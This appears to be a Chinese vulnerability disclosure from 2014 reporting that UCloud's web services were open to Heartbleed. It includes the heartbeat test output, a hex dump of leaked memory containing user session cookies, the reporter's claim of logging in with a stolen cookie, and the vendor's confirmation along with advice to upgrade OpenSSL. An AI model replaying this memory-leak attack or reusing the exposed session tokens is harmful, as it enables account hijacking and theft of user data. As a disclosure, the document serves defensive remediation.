UCloud运维不当导致可以登录随机用户并且获取服务器敏感信息(成功登录)

漏洞详情

披露状态:

2014-04-09: 细节已通知厂商并且等待厂商处理中
2014-04-09: 厂商已经确认,细节仅向厂商公开
2014-04-19: 细节向核心白帽子及相关领域专家公开
2014-04-29: 细节向普通白帽子公开
2014-05-09: 细节向实习白帽子公开
2014-05-24: 细节向公众公开

简要描述:

UCloud运维不当导致可以登录随机用户并且获取服务器敏感信息

详细说明:

https://uhost.ucloud.cn

https://udb.ucloud.cn

获得敏感信息

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 3187
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 02 01 04 03 ....#...........
00e0: 05 03 02 03 04 02 02 02 00 12 00 00 03 04 02 02 ................
00f0: 02 35 EC 72 16 9E 9C 09 36 BE 3F 30 0B 7E 66 45 .5.r....6.?0.~fE
0100: 0B 1F A5 08 8F AE 95 D0 0A CF 4E 8B B5 D6 7A 56 ..........N...zV
0110: 0E 8C 3E 35 CC 0C 13 78 39 D5 E4 8A 43 9A E5 DF ..>5...x9...C...
0120: 9C 62 C5 CA 60 CF 07 51 DD C1 1A 3D 45 86 23 FE .b..`..Q...=E.#.
0130: 7C A9 56 D2 60 AE 69 23 8E A0 BB FA 8F 96 C9 C7 |.V.`.i#........
0140: 02 91 30 E5 F4 94 EF 3A 61 2A 1B 0D 46 48 2D 66 ..0....:a*..FH-f
0150: 64 E6 12 5A 1E 3A A4 A2 46 D5 B9 5F 21 46 EC FB d..Z.:..F.._!F..
0160: F6 08 DD 08 05 45 AB 32 56 3D 87 01 C6 A6 73 01 .....E.2V=....s.
0170: AE 3E A6 D1 6E 04 09 2C 00 05 00 05 01 00 00 00 .>..n..,........
0180: 00 47 42 4B 2C 75 74 66 2D 38 3B 71 3D 30 2E 37 .GBK,utf-8;q=0.7
0190: 2C 2A 3B 71 3D 30 2E 33 0D 0A 43 6F 6F 6B 69 65 ,*;q=0.3..Cookie
01a0: 3A 20 72 65 66 65 72 72 65 72 5F 75 72 6C 3D 68 : referrer_url=h
01b0: 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2E ttp%3A%2F%2Fwww.
01c0: 67 6F 6F 67 6C 65 2E 63 6F 6D 2E 68 6B 25 32 46 google.com.hk%2F
01d0: 75 72 6C 25 33 46 73 61 25 33 44 74 25 32 36 72 url%3Fsa%3Dt%26r
01e0: 63 74 25 33 44 6A 25 32 36 71 25 33 44 55 43 6C ct%3Dj%26q%3DUCl
01f0: 6F 75 64 25 32 36 73 6F 75 72 63 65 25 33 44 77 oud%26source%3Dw
0200: 65 62 25 32 36 63 64 25 33 44 31 25 32 36 76 65 eb%26cd%3D1%26ve
0210: 64 25 33 44 30 43 44 67 51 46 6A 41 41 25 32 36 d%3D0CDgQFjAA%26
0220: 75 72 6C 25 33 44 25 32 35 36 38 25 32 35 37 34 url%3D%2568%2574
0230: 25 32 35 37 34 25 32 35 37 30 25 32 35 37 33 25 %2574%2570%2573%
0240: 32 35 33 61 25 32 35 32 66 25 32 35 32 66 25 32 253a%252f%252f%2
0250: 35 37 37 25 32 35 37 37 25 32 35 37 37 25 32 35 577%2577%2577%25
0260: 32 65 25 32 35 37 35 25 32 35 36 33 25 32 35 36 2e%2575%2563%256
0270: 63 25 32 35 36 66 25 32 35 37 35 25 32 35 36 34 c%256f%2575%2564
0280: 25 32 35 32 65 25 32 35 36 33 25 32 35 36 65 25 %252e%2563%256e%
0290: 32 35 32 66 25 32 36 65 69 25 33 44 56 7A 6B 36 252f%26ei%3DVzk6
02a0: 55 38 47 48 45 75 65 59 69 41 65 51 6A 6F 44 51 U8GHEueYiAeQjoDQ
02b0: 41 51 25 32 36 75 73 67 25 33 44 41 46 51 6A 43 AQ%26usg%3DAFQjC
02c0: 4E 45 49 41 56 4F 46 4B 48 71 4B 6D 65 78 45 36 NEIAVOFKHqKmexE6
02d0: 73 46 44 56 70 53 42 50 52 74 61 46 51 25 32 36 sFDVpSBPRtaFQ%26
02e0: 62 76 6D 25 33 44 62 76 2E 36 33 39 33 34 36 33 bvm%3Dbv.6393463
02f0: 34 25 32 43 64 2E 61 47 63 25 32 36 63 61 64 25 4%2Cd.aGc%26cad%
0300: 33 44 72 6A 74 3B 20 74 67 74 3D 54 47 43 2D 31 3Drjt; tgt=TGC-1
0310: 33 39 36 33 32 34 37 32 35 72 35 42 32 36 38 46 396324725r5B268F
0320: 33 46 42 32 37 45 30 46 39 34 45 34 3B 20 50 48 3FB27E0F94E4; PH
0330: 50 53 45 53 53 49 44 3D 53 54 2D 31 33 39 36 33 PSESSID=ST-13963
0340: 33 38 33 32 33 72 31 30 46 30 31 35 31 31 34 33 38323r10F0151143
0350: 31 30 39 32 41 30 32 41 3B 20 5F 5F 75 74 6D 61 1092A02A; __utma
0360: 3D 31 31 31 33 38 39 33 33 32 2E 31 31 35 35 32 =111389332.11552
0370: 33 38 38 36 30 2E 31 33 39 36 33 33 34 31 37 38 38860.1396334178
0380: 2E 31 33 39 36 33 33 34 31 37 38 2E 31 33 39 36 .1396334178.1396
0390: 33 33 38 33 32 36 2E 32 3B 20 5F 5F 75 74 6D 63 338326.2; __utmc
03a0: 3D 31 31 31 33 38 39 33 33 32 3B 20 5F 5F 75 74 =111389332; __ut
03b0: 6D 7A 3D 31 31 31 33 38 39 33 33 32 2E 31 33 39 mz=111389332.139
03c0: 36 33 33 38 33 32 36 2E 32 2E 32 2E 75 74 6D 63 6338326.2.2.utmc
03d0: 73 72 3D 75 64 62 2E 75 63 6C 6F 75 64 2E 63 6E sr=udb.ucloud.cn
03e0: 7C 75 74 6D 63 63 6E 3D 28 72 65 66 65 72 72 61 |utmccn=(referra
03f0: 6C 29 7C 75 74 6D 63 6D 64 3D 72 65 66 65 72 72 l)|utmcmd=referr
0400: 61 6C 7C 75 74 6D 63 63 74 3D 2F 75 64 62 2F 63 al|utmcct=/udb/c
0410: 72 65 61 74 65 3B 20 48 6D 5F 6C 76 74 5F 36 31 reate; Hm_lvt_61
0420: 37 65 33 36 65 39 63 33 35 65 65 32 61 62 36 33 7e36e9c35ee2ab63
0430: 63 66 39 30 62 34 66 64 32 61 33 64 33 64 3D 31 cf90b4fd2a3d3d=1
0440: 33 39 36 30 38 37 36 34 36 2C 31 33 39 36 33 32 396087646,139632
0450: 34 37 30 36 3B 20 48 6D 5F 6C 70 76 74 5F 36 31 4706; Hm_lpvt_61
0460: 37 65 33 36 65 39 63 33 35 65 65 32 61 62 36 33 7e36e9c35ee2ab63
0470: 63 66 39 30 62 34 66 64 32 61 33 64 33 64 3D 31 cf90b4fd2a3d3d=1
0480: 33 39 36 33 33 39 32 35 35 0D 0A 0D 0A 5E 8B B7 396339255....^..
0490: 90 FA 5A 1A 12 16 BE 41 D1 6B 55 2F 8E B6 5E 45 ..Z....A.kU/..^E
04a0: EE 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E ................
04b0: E6 06 0F 6F 2E 3C 87 CC 64 4D 64 DE F8 07 8A 0C ...o.<..dMd.....
04c0: A4 A6 68 A3 B9 6A 84 4E A9 F4 AD 69 20 86 44 58 ..h..j.N...i .DX
04d0: 46 D9 57 E1 E3 1B 1E 70 0B F6 EE 32 F2 C4 5E D1 F.W....p...2..^.
04e0: 6A 7C 2B 5A 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B j|+Z............
04f0: 94 56 04 9F A6 9A 4B 45 8E E9 2B 75 74 74 90 D6 .V....KE..+utt..
0500: 31 CD C8 BC 84 60 BD 1D 96 69 11 9E 67 88 F0 F9 1....`...i..g...
0510: 55 8E FC 23 CF 36 49 3E 26 AD E4 FE A5 35 E4 42 U..#.6I>&....5.B
0520: A1 49 D7 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C .I..............
0530: 17 03 01 00 20 75 6D 48 7F AD 01 FF CC FE 26 22 .... umH......&"
0540: 03 15 84 0A 45 4E 86 FA 66 B3 0A 0A 0A 0A 0A 0A ....EN..f.......
0550: 0A 0A 0A 0A 0A 17 03 01 00 90 8B C7 80 27 82 B4 .............'..
0560: E9 AC 0D 66 40 11 53 1B 09 62 09 0E 8E 0C 0F C0 ...f@.S..b......
0570: 3F BE 2A 64 13 88 24 36 90 0C 7E CB 16 1C 41 FF ?.*d..$6..~...A.
0580: 72 9B BB 20 F4 B1 18 03 E7 1A 09 7A F3 FF 95 8E r.. .......z....
0590: 73 17 B7 9D C8 34 E9 A1 CD F2 EF 2F 5C BE E0 3C s....4...../\..<
05a0: 51 54 48 84 10 62 E3 7D 34 5F 00 E7 26 1A 2C CB QTH..b.}4_..&.,.
05b0: F8 74 B8 D6 A0 8F 68 7A A4 ED C4 D5 F5 4C 42 3D .t....hz.....LB=
05c0: 0B DE D0 F4 43 8F 5F 4D 93 05 10 50 8C 50 A9 72 ....C._M...P.P.r
05d0: E2 67 59 BC 06 F0 6A CC 7F C0 AC 45 89 44 07 7F .gY...j....E.D..
05e0: 83 F9 99 70 9A C4 B1 55 3D 95 8F 5F 4D 93 05 10 ...p...U=.._M...
05f0: 50 8C 50 A9 72 E2 67 59 BC 06 F0 6A CC 7F C0 AC P.P.r.gY...j....
0600: 45 89 44 07 7F 83 F9 99 70 9A C4 B1 55 3D 95 65 E.D.....p...U=.e
0610: 39 63 33 35 65 65 32 61 62 36 33 63 66 39 30 62 9c35ee2ab63cf90b
0620: 34 66 64 32 61 33 64 33 64 3D 31 33 39 36 39 34 4fd2a3d3d=139694
0630: 34 35 30 36 0D 0A 49 66 2D 4D 6F 64 69 66 69 65 4506..If-Modifie
0640: 64 2D 53 69 6E 63 65 3A 20 54 68 75 2C 20 31 39 d-Since: Thu, 19
0650: 20 44 65 63 20 32 30 31 33 20 30 34 3A 35 39 3A Dec 2013 04:59:
0660: 31 35 20 47 4D 54 0D 0A 0D 0A CC 16 AB 46 AE D2 15 GMT.......F..
0670: DE C6 52 94 19 C5 50 23 93 E4 01 FF E9 1C C5 BE ..R...P#........
0680: 64 23 EB A9 1F 37 D1 0A 68 F9 12 24 74 68 69 6E d#...7..h..$thin
0690: 6B 70 68 70 2E 63 6E 25 32 36 64 74 64 25 33 44 kphp.cn%26dtd%3D
06a0: 31 38 3B 20 48 6D 5F 6C 76 74 5F 36 31 37 65 33 18; Hm_lvt_617e3
06b0: 36 65 39 63 33 35 65 65 32 61 62 36 33 63 66 39 6e9c35ee2ab63cf9
06c0: 30 62 34 66 64 32 61 33 64 33 64 3D 31 33 39 36 0b4fd2a3d3d=1396
06d0: 39 34 32 30 34 34 2C 31 33 39 36 39 34 32 39 30 942044,139694290
06e0: 34 3B 20 48 6D 5F 6C 70 76 74 5F 36 31 37 65 33 4; Hm_lpvt_617e3
06f0: 36 65 39 63 33 35 65 65 32 61 62 36 33 63 66 39 6e9c35ee2ab63cf9
0700: 30 62 34 66 64 32 61 33 64 33 64 3D 31 33 39 36 0b4fd2a3d3d=1396
0710: 39 34 32 39 31 31 0D 0A 49 66 2D 4D 6F 64 69 66 942911..If-Modif
0720: 69 65 64 2D 53 69 6E 63 65 3A 20 54 75 65 2C 20 ied-Since: Tue,
0730: 32 34 20 44 65 63 20 32 30 31 33 20 30 37 3A 34 24 Dec 2013 07:4
0740: 34 3A 31 38 20 47 4D 54 0D 0A 0D 0A E4 30 B1 B7 4:18 GMT.....0..
0750: 3D F8 B0 BE 6C B6 61 41 E7 03 DE AF 34 30 6C 64 =...l.aA....40ld
0760: 33 30 6C 76 32 33 2D 2D 73 74 31 35 73 61 31 32 30lv23--st15sa12
0770: 6C 74 32 30 6C 64 31 36 6C 76 31 36 2D 73 74 31 lt20ld16lv16-st1
0780: 32 73 61 31 30 2D 73 74 31 32 73 61 31 30 25 32 2sa10-st12sa10%2
0790: 36 72 75 72 6C 25 33 44 68 74 74 70 25 32 35 33 6rurl%3Dhttp%253
07a0: 41 25 32 35 32 46 25 32 35 32 46 77 77 33 38 2E A%252F%252Fww38.
07b0: 6C 69 6E 75 78 66 61 62 2E 63 78 25 32 35 32 46 linuxfab.cx%252F
07c0: 25 32 36 72 65 66 25 33 44 68 74 74 70 25 32 35 %26ref%3Dhttp%25
07d0: 33 41 25 32 35 32 46 25 32 35 32 46 77 77 77 2E 3A%252F%252Fwww.
07e0: 73 74 75 64 79 2D 61 72 65 61 2E 6F 72 67 25 32 study-area.org%2
07f0: 35 32 46 6C 69 6E 6B 2E 68 74 6D 0D 0A 0D 0A 5D 52Flink.htm....]
0800: 11 C6 69 CF 01 65 1F B3 5D 31 CA 9E 61 9C D3 2E ..i..e..]1..a...
0810: 75 74 6D 63 73 72 3D 28 64 69 72 65 63 74 29 7C utmcsr=(direct)|
0820: 75 74 6D 63 63 6E 3D 28 64 69 72 65 63 74 29 7C utmccn=(direct)|
0830: 75 74 6D 63 6D 64 3D 28 6E 6F 6E 65 29 0D 0A 0D utmcmd=(none)...
0840: 0A 0C E2 A8 8B 73 71 FE 0D 53 41 81 DC BE 61 3D .....sq..SA...a=
0850: FA 46 43 32 32 35 39 0D 0A 0D 0A FD 2C 93 BB C8 .FC2259.....,...
0860: 4A 58 D6 25 CC 83 48 67 FE 37 C9 FE 2E D6 0C B2 JX.%..Hg.7......
0870: DE 4D 85 23 37 04 6B 5A 0C 0C 0C 0C 0C 0C 0C 0C .M.#7.kZ........
0880: 0C 0C 0C 0C 0C DD 2B BC 8B CE FE FE 6D EE 75 A7 ......+.....m.u.
0890: 2B 92 E8 7A 94 B8 63 AF 87 B4 74 3D 2F 0D 0A 0D +..z..c...t=/...
08a0: 0A 95 A9 40 DA B2 55 E0 62 72 AF AA AC AB 66 06 ...@..U.br....f.
08b0: 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f...............
08c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

漏洞证明:

成功利用cookie登录,可进行下一步攻击

1.png

修复方案:

升级openssl

版权声明:转载请注明来源 海绵宝宝@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-04-09 15:25

厂商回复:

感谢您对UCLOUD 的支持, 还想要提一下, 更新openssl 时有些依赖程序,如果是动态链接,需要重启服务, 静态连接则需要重新编译服务了,例如: Nginx

最新状态:

暂无


漏洞评价: